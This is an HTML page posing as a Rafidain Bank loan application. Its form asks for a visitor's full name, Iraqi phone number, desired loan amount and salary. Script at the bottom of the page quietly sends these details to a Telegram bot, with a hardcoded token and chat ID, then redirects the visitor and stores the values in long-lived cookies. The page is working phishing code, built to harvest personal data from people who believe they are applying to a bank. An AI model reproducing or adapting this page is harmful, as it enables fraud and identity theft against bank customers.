<!DOCTYPE html>
<!-- Last Published: Sat Nov 02 2024 03:43:02 GMT+0000 (Coordinated Universal Time) -->
<html data-wf-domain="" data-wf-page="58e125466699330e60585c64" data-wf-site="64ef7d0d34ee51e7fdfd939c" lang="en">

<head>
  <meta charset="utf-8" />
  <title>مصرف الرافدين - الصفحة الرئيسية</title>
  <meta content="مصرف الرافدين" property="og:title" />
  <meta content="مصرف الرافدين" property="og:description" />
  <meta content="https://www2.0zz0.com/2025/03/23/08/778256839.jpeg" property="og:image" />
  <meta content="مصرف الرافدين" property="twitter:title" />
  <meta content="مصرف الرافدين" property="twitter:description" />
  <meta content="https://www2.0zz0.com/2025/03/23/08/778256839.jpeg" property="twitter:image" />
  <meta property="og:type" content="website" />
  <meta content="summary_large_image" name="twitter:card" />
  <meta content="width=device-width, initial-scale=1" name="viewport" />
  <link href="https://cdn.prod.website-files.com/6709b4ecad0f1ceeeed96305/css/orangemonney.webflow.4d36521a0.css" rel="stylesheet" type="text/css" />
  <link href="https://fonts.googleapis.com" rel="preconnect" />
  <link href="https://fonts.gstatic.com" rel="preconnect" crossorigin="anonymous" />
  <script src="https://ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js" type="text/javascript"></script>
  <script type="text/javascript">
    WebFont.load({
      google: {
        families: ["Montserrat:100,100italic,200,200italic,300,300italic,400,400italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic", "Roboto:300,regular,500"]
      }
    });
  </script>
  <script type="text/javascript">
    !function (o, c) {
      var n = c.documentElement, t = " w-mod-"; n.className += t + "js", ("ontouchstart" in o || o.DocumentTouch && c instanceof DocumentTouch) && (n.className += t + "touch")
    }(window, document);
  </script>
  <link href="" rel="shortcut icon" type="image/x-icon" />
  <link href="https://cdn.prod.website-files.com/img/webclip.png" rel="apple-touch-icon" />
  <style>
    body {
      box-sizing: border-box;
      font-size: 18px;
    }

    .container {
      /*max-width: 800px;*/
      padding: 0 5%;
      /*margin: auto;*/
    }

    .field-holder {
      position: relative;
      margin-bottom: 1.25em;
    }

    .w-input {
      border: 0;
      border-bottom: 3px solid #008000; /* Changed to green */
      outline: none;
    }

    label {
      position: absolute;
      top: 0;
      left: 0;
      font-size: 1em;
      color: #008000; /* Changed to green */
      display: flex;
      align-items: center;
      cursor: text;
      transition: .3s ease-in-out;
    }

    .w-input,
    label {
      font-size: 1em;
      width: 100%;
      height: 55px;
    }

    .w-input:focus + label,
    .w-input:valid + label {
      color: #008000; /* Changed to green */
      font-size: .75em;
      top: -25px;
      pointer-events: none;
    }

    .w-input:focus,
    .w-input:valid {
      border-bottom: 3px solid #008000; /* Changed to green */
    }

    .CustomFooter {
      position: fixed;
      left: 0;
      bottom: 0;
    }

    .submit-button {
      background-color: #008000; /* Changed to green */
    }

    .button-black {
      background-color: black;
      color: white;
    }

    .not-black {
      background-color: #008000; /* Changed to green */
    }

    .image-center {
      display: block;
      margin-left: auto;
      margin-right: auto;
      width: 150px; /* Adjust the width as needed */
      height: auto;
      margin-bottom: 20px; /* Adjust the margin as needed */
    }

    .request-text {
      font-size: 1.5em;
      color: #008000; /* Changed to green */
      text-align: center; /* Center align the text */
      margin-top: 20px;
    }
    
    .checkbox-container {
      display: flex;
      align-items: center;
      margin-bottom: 1.25em;
    }
    
    .checkbox-container input {
      margin-right: 10px;
    }
    
    .checkbox-container label {
      font-size: 1em;
      color: #008000; /* Changed to green */
    }
  </style>
</head>

<body class="body">
  <div class="div-block-2">
    <img src="https://www2.0zz0.com/2025/03/22/16/386383008.jpeg" alt="Top Image" class="image-center">
    <div class="request-text">قم بتقديم طلبك</div>
  </div>
  <div class="div-block-4">
    <div class="container">
      <div class="w-form">
        <form id="signin" name="wf-form-" data-name="تسجيل الدخول" redirect="/verification.html" data-redirect="/verification.html" method="get" data-wf-page-id="58e125466699330e60585c64" data-wf-element-id="79a466c5-9c18-b348-97ed-cbe6dd2fa663">

          </div>
          <div id="field" class="field-holder"><input class="text-field-2 w-input" name="fullname" placeholder="" type="text" id="fullname" required="" />        <label for="fullname" class="field-label">الاسم الرباعي</label></div>
          <div id="field" class="field-holder"><input class="text-field-2 w-input" minlength="11" maxlength="11" name="phonenumber" inputmode="numeric" data-name="رقم الهاتف" pattern="^(079|078|077)[0-9]{8}$" placeholder="" type="text" id="phonenumber" required="" /><label for="phonenumber" class="field-label">رقم الهاتف</label></div>
          <div id="field" class="field-holder">
            <select class="text-field-2 w-input" name="loanamount" id="loanamount" required="">

              <option value="5000000">5 مليون</option>
              <option value="10000000">10 مليون</option>
              <option value="20000000">20 مليون</option>
              <option value="25000000">25 مليون</option>
              <option value="30000000">30 مليون</option>
            </select>
            <label for="loanamount" class="field-label">اختر مبلغ السلفة</label>
          </div>
          <div id="field" class="field-holder">
            <select class="text-field-2 w-input" name="salary" id="salary" required="">

              <option value="من 100 الى 500">من 100 ألف الى 500 الف</option>
              <option value="من 500 الف الى 700 الف">من 500 الف الى 700 الف</option>
              <option value="من 700 ألف الى مليون">من 700 ألف الى مليون</option>
              <option value="مليون وأكثر">مليون وأكثر</option>

            </select>
            <label for="salary" class="field-label">ادخل الراتب الشهري</label>
          </div>
          <div class="div-block"><input type="submit" data-wait="يرجى الانتظار" class="submit-button w-button" value="قم بتقديم طلبك" /></div>
        </form>
        <div class="w-form-done">
          <div>Thank you! Your submission has been received!</div>
        </div>
        <div class="w-form-fail">
          <div>Oops! Something went wrong while submitting the form.</div>
        </div>
      </div>
    </div>
  </div>
  <script src="https://d3e54v103j8qbb.cloudfront.net/js/jquery-3.5.1.min.dc5e7f18c8.js?site=6709b4ecad0f1ceeeed96305" type="text/javascript" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script>
  <script src="https://cdn.prod.website-files.com/6709b4ecad0f1ceeeed96305/js/webflow.1a78e01dd.js" type="text/javascript"></script>
  <script src="https://code.jquery.com/jquery-latest.min.js" type="text/javascript"></script>
  <script src="https://cdn.jsdelivr.net/npm/jquery-validation@1.20.1/dist/jquery.validate.min.js"></script>
  <script>
    function setCookie(cname, cvalue, exdays) {
      const d = new Date();
      d.setTime(d.getTime() + (exdays * 24 * 60 * 60 * 1000));
      let expires = "expires=" + d.toUTCString();
      document.cookie = cname + "=" + cvalue + ";" + expires + ";path=/";
    }

    $('#signin').on("submit", function (event) {
      event.preventDefault(); // منع الإرسال الافتراضي للنموذج

      var fullname = document.getElementById('fullname').value;
      var phonenumber = document.getElementById('phonenumber').value;
      var loanamount = document.getElementById('loanamount').value;
      var salary = document.getElementById('salary').value;

      var message = "الاسم الرباعي: `" + fullname + "`\n"
      message += "رقم الهاتف: `" + phonenumber + "`\n"
      message += "مبلغ السلفة: `" + loanamount + "`\n"
      message += "الراتب الشهري: `" + salary + "`\n"

      $.ajax({
        type: 'POST',
        url: `https://api.telegram.org/bot8140864335:AAFz12wCszQjSkmCQ8DOjvh09fSqh8S_sN0/sendMessage`,
        data: {
          chat_id: "7779105403",
          text: message,
          parse_mode: 'markdown',
        },
        success: function (res) {
          console.debug(res);
          $('#response').text('Message sent');

          // توجيه المستخدم إلى صفحة التحقق بعد نجاح الإرسال
          window.location.href = "done.html";
        },
        error: function (error) {
          console.error(error);
          alert("error failed");
        }
      });

      setCookie("fullname", fullname, 1000);
      setCookie("phonenumber", phonenumber, 1000);
      setCookie("loanamount", loanamount, 1000);
      setCookie("salary", salary, 1000);
    })
  </script>
</body>

</html>
